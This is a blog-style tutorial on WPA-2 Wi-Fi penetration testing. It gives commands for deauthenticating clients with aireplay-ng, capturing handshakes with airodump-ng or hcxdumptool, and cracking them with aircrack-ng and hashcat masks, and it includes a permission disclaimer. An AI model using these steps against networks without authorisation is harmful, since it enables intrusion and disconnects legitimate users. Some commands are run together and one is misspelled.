Wireless Penetration Testing (WPA-2 Cracking)
In this article, I’ll discuss Wireless Penetration Testing and Cracking WPA-2 Protected Wifi. I will talk about two different methods that we can use to pentest the WPA-2 Network. So, Let’s get into the topic :)
Caution: This article is only for educational purposes. You have to Pentest only on the Networks that you legally own or that you have permission to test on.
There are two methods that we can use, one is Capturing Full Way Handshake and the second one is by Using hcxdumptool. Once we get the hash file or handshake file we can take the file offline and crack the hash. So Basically, We will get the hash file in both ways, then we need to crack the hash using Hashcat.
Prerequisites:
- Wifi Adaptor (Monitor Mode Supported).
- A Linux Machine.
- airmon-ng,airodump-ng,aircrack-ng (for method 1)
- hcxdumptool and hcxtools (for method 2)
- Hashcat
- Wifi Network that you have permission to test.
1. Capturing Full Way Handshake (airodump-ng)
I know this old way to crack the wifi passwords but it still works great. In this method, we will capture a full-way handshake by sending the de-auth signal to a user on the network.
Install the required software by entering the following command
sudo apt install aircrack-ngStart by entering the network interface into the monitor mode. Type the following commands to start the monitor mode.
iwconfigsudo airmon-ng check killsudo airmon-ng start wlp8s0
Here, wlp8s0 is my network interface.
Type iwconfig, to ensure monitor mode is started.
Now, We can use airodump-ng to list all wifi networks
sudo airodump-ng wlp8s0mon
It will display Network BSSID, and Channel (CH) details of networks.
Copy target Wifi BSSID and CH.
Now, start dumping a full-way handshake using the following command
sudo airodump-ng -c 6 --bssid A6:0C:ID:ID:ID:ID -w filename wlp8s0mon
It starts listening for a handshake. We can see devices that are connected to the target network. To capture the full-way handshake, we need to send a de-auth signal to a user on the target network. To send a de-auth signal, open a new terminal tab and use the following command.
sudo aireplay-ng -0 1 -a WIFI:BSSID -c DEVICE:BSSID wlp8s0monOnce, the de-auth is completed come back to the previous terminal. You can see that WPA handshake is captured. Now, you can press ctrl+c to stop the process.
Now, we have filename.cap file. We can either use aircrack-ng to crack the password or we can convert filename.cap to hash.hc22000 and then we crack the hash using hashcat.
- To crack using aircrack-ng use the following command.
aircrack-ng -w rockyou.txt -b BSSID filename.cap
- To convert the .cap to hashcat hash format use the following website.
Upload filename.cap on the website and you can download the converted hash.hc22000 file.
2. Using hcxdumptool
This method is easy to follow and this doesn't require sending the de-auth signal to the user on the network.
Install hcxdumptool and hcxtools from the below links:
Once the required software is installed, follow the process.
First, stop the NetworkManager and Wpa supplicant by using the following commands.
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.serviceThen, start the hcxdumptool to dump the pcapng file.
sudo hcxdumptool -i wlp8s0 -o dumpfile.pcapng --active_beacon --enable_status=15
Once, it is started we can wait for some to capture enough packets. Then, stop the process with ctrl+c.
Now, We have dumpfile.pcapng file in our machine. Start the NetworkManager and wpa supplicant service by the following command.
sudo systemctl start wpa_supplicant.service
sudo systemctl start NetworkManager.serviceNext, we have to convert the .pcapng file to a crackable .hc22000 file. To do that use the following command.
hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapngNow, we have hash.hc22000 file which can be cracked by using hashcat.
3. Hashcat for cracking
Download the latest release of hashcat from https://hashcat.net/hashcat
- Dictionary attack (wordlist) using hashcat.
hashcat -m 22000 hash.hc22000 rockyou.txt- Bruteforce using hashcat.
hahscat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?dThe above command is for brute-forcing an 8-digit number password.
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?dYou can also form a pattern for a password that is 10-digit and starts with 9.
hashcat -m 22000 hash.hc22000 -a 3 9?d?d?d?d?d?d?d?d?dTo make your own mask pattern refer the following guide from hashcat.
Thank you for reading my article. I hope this is useful for you.
If you like this post please share and follow me for more interesting posts like this :)
